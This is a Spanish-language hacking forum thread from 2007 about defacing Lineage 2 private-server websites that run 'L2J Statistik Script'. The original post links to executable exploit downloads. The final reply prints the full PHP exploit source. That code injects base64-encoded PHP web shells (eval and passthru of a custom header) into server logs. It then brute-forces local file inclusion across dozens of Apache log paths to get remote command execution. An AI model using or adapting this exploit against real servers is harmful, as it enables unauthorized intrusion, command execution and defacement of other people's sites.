elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Servidor TeamSpeak 3: crea tu propio canal gratis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Hackeando webs de Lineage 2 - video
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Hackeando webs de Lineage 2 - video  (Leído 23,551 veces)
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Hackeando webs de Lineage 2 - video
« en: 2 Enero 2007, 01:28 »

Esop, es un video-tutorial que muestra como "hackear" o defacear webs de Lineage 2, que usen servidores L2J.

La gran mayoría de los servidores de Lineage 2 L2J, ya sean tanto caseros como de comunidades, utilizan el portal "L2J Statistik Script".  Es mas, todos los packs listos (con apache + mysql + server l2j) incluyen dicha web.. asi que no es raro encontrar este tipo de webs en servers L2J.

Acá se muestra la ejecución del exploit para este tipo de webs.

El exploit lo pueden descargar desde aca:
http://rapidshare.com/files/5656195/cb.zip.html
http://rapidshare.com/files/5656403/cb-diskw.zip.html
(Siento mucho que sean .exe, pero el codigo fuente no es "publico" aun. Esto debido a que las ultimas 2 utilidades que hice, alguien cambio los creditos y lo subio a su sitio y otros sitios de seguridad a su nombre)



Saludos, ::)
En línea



W4ck1ng Team Member
sch3m4
Colaborador
***
Desconectado Desconectado

Mensajes: 1.606

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Hackeando webs de Lineage 2 - video
« Respuesta #1 en: 2 Enero 2007, 03:05 »

seguro k él no publicó "su" código ;)
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #2 en: 2 Enero 2007, 04:10 »

seguro k él no publicó "su" código ;)

Bueno en todo caso el video y el exploit los hice yo.
Y si, publique "mi" codigo.. pero en ninguno de los foros donde antes habia publicado los otros (este inclusive).. pues en aquellos.. me plagiaron.

Dentro de todo es "mi" codigo, aunque el exploit esta basado en otros.. la vulnerabilidad la encontre yo y el exploit fue mejorado para que sea mas completo que aquellos exploits "originales".

Saludos,  ;)

Atte
Chico AKA Codebreak
« Última modificación: 2 Enero 2007, 04:12 por chico » En línea



W4ck1ng Team Member
Critical Hit

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #3 en: 4 Enero 2007, 13:22 »

Pues sin un código fuente por delante no pienso ejecutar eso en mi PC.

Buena suerte.
En línea

C R I T I C A L   H I T
codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #4 en: 4 Enero 2007, 16:02 »

Pues sin un código fuente por delante no pienso ejecutar eso en mi PC.

Buena suerte.

Soy usuario de este foro hace ya un par de años... y no seria capaz de enviarles un archivo infectado.

El exploit lo hice yo, lo subí yo y les digo que no tiene nada. De todos modos, si lo quieres ejecutar o no, me es indiferente.. puesto que puedes ver su funcionamiento en el video.. y este post es meramente para compartir información y posterior prevención, no para forzar su aplicacion.

Saludos,
En línea



W4ck1ng Team Member
Conemrad

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #5 en: 4 Enero 2007, 21:53 »

los exploits los detecta como virus
En línea

codebreak

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #6 en: 5 Enero 2007, 02:01 »

los exploits los detecta como virus

Creo que esa es una información un poco general.
No me extrañaría que un antivirus lo detecte como exploit o archivo malicioso, como sucede normalmente con cualquier herramienta similar.

Como virus?. Que virus?.
Por favor adjunta una captura del mensaje.

Saludos,
En línea



W4ck1ng Team Member
SergioDS

Desconectado Desconectado

Mensajes: 29



Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #7 en: 5 Enero 2007, 02:28 »

nose si fiarme, men puedes poner en tu codigo algo cifrado en base 64 por ejemplo y que te de el credito ati, eso no lo suelen quitar, esque no soy partidario de los .exe sin fuente
En línea



"Solo Existen 10 tipos de personas, las qe conocen el binario y las que no"
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #8 en: 5 Enero 2007, 13:13 »

C:\>diskw.exe
Acceso denegado.
En línea

Experimental Serial Lain [Linux User]
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Hackeando webs de Lineage 2 - video
« Respuesta #9 en: 5 Enero 2007, 13:22 »

Citar
<?

print '
 |    ___ \      | \ \        /    |             ____|            |      _) |   
 |       ) |     |  \ \  \   / _ \ __ \          __| \ \  / __ \  |  _ \  | __|
 |      __/  \   |   \ \  \ /  __/ |   | _____|  |    `  <  |   | | (   | | |   
_____|_____|\___/     \_/\_/ \___|_.__/         _____|_/\_\ .__/ _|\___/ _|\__|
                                                           _|                   
             __ )\ \   /
             __ \ \   / 
             |   |   |   
            ____/   _|   
         
        ___|           |      |                    |   
       |      _ \   _` |  _ \ __ \   __| _ \  _` | |  /
       |     (   | (   |  __/ |   | |    __/ (   |   < 
      \____|\___/ \__,_|\___|_.__/ _|  \___|\__,_|_|\_\  Rev.4

   
      ~ [ www.codebreak.tk - codebreak1984@gmail.com] ~
 

         Application: L2J Statistik Script  <= v0.09

       works with register_globals=On & magic_quotes=off


Exploit by: Codebreak (a.k.a Chico)
Contact: codebreak1984@gmail.com
';

if ($argc<5) {
print_r('
-----------------------------------------------------------------------------
Usage: cb.exe -type host path cmd
type:
 -shell    Execute shell commands.
 -php      Execute PHP code.
host:      target server (ip or hostname)
path:      Statistik Script path
cmd:       shell command (ls -la, dir, etc..) or php code.
Options:
 -p[port]:    specify a port (default 80)
 -P[ip:port]: specify a proxy:port
Example:
 '.$argv[0].' www.l2jserver.com / ls -la -P1.1.1.1:80
 '.$argv[0].' www.gamingsite.com /lineage2/ dir
-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$cb=$argv[1];
$host=$argv[2];
$path=$argv[3];
$cmd="";

$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($cb=="-php")
{
$plop = "php";
$breaker = base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspOyBpbmlfc2V0KG1heF9leGVjdXRpb25fdGltZSwwKTsgaWYoaXNzZXQoJF9TRVJWRVJbSFRUUF9IT0xBXSkpeyAgICRwaHAgPSBnZXRfbWFnaWNfcXVvdGVzX2dwYygpPyBzdHJpcHNsYXNoZXMoJF9TRVJWRVJbSFRUUF9IT0xBXSk6JF9TRVJWRVJbSFRUUF9IT0xBXTsgZXZhbCgkcGhwLlwiO1wiKTsgfSBkaWU7ID8+");
}
if ($cb=="-shell")
{
$plop = "shell";
$breaker = base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspO2luaV9zZXQobWF4X2V4ZWN1dGlvbl90aW1lLDApOyBwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hPTEFdKTsgZGllOyA/Pg==");
}
echo "Poisoning Files ...\r\n\r\n";


$p3="".$p2."index.php?page=".$breaker."";

$packet="GET ".$p3.$breaker." HTTP/1.0\r\n";
$packet.="User-Agent: ".$breaker." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
sleep(3);

echo "Searching vulnerable files ...\n";
$packet ="POST ".$p."/index.php?page=stat.php&step=clan&search=".$breaker." HTTP/1.0\r\n";
$packet.="User-Agent: ".$breaker."\r\n";
$packet.="CLIENT-IP: ".$breaker."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
if (strstr($html,"codebreak"))
{
$temp=explode("codebreak",$html);
die($temp[1]);
}



echo "";
$pakiet="GET ".$p.$breaker." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
sleep(1);

$paths= array (
"access.log"
);

for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "";
$packet ="GET ".$p."index.php?page=../".$paths[$i]." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"codebreak"))
{
$temp=explode("codebreak",$html);
die($temp[1]);
}
}
$include= array (
"index.php"
);


$paths= array (
"../../../../../../usr/local/Apache2/logs/error.log",
"../../../../../../usr/local/Apache2/logs/access.log",
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../usr/local/apache2/logs/access_log",
"../../../../../usr/local/apache2/logs/access.log",
"../../../../../var/log/apache2/access_log",
"../../../../../var/log/apache2/access.log",
"../../../../../usr/local/apache2/logs/error_log",
"../../../../../usr/local/apache2/logs/error.log",
"../../../../../var/log/apache2/error_log",
"../../../../../var/log/apache2/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

for ($i=0; $i<=count($paths)-1; $i++)
for ($l=0; $l<=count($include)-1; $l++)
{
{
$b=$l+2;
echo " Poisoned file?...[".$plop."]\n";
$packet ="GET ".$p."".$include[$l]."?page=".$paths[$i]." HTTP/1.1\r\n";
$packet.="HOLA: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);

if (strstr($html,"codebreak"))
{
echo "\r\n\r\n\r\n\r\nExploit succeeded....\r\n\r\n\r\n\r\n";
$temp=explode("codebreak",$html);
die($temp[1]);
}
}
}
echo "Exploit Failed. Possibly register_globals off or magic_quotes on\r\n";
echo "codebreak1984@gmail.com\r\n";
echo "www.codebreak.tk\r\n";

// Based in Kacper LFI codes.
?>
En línea

Experimental Serial Lain [Linux User]
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.20 | SMF © 2006-2008, Simple Machines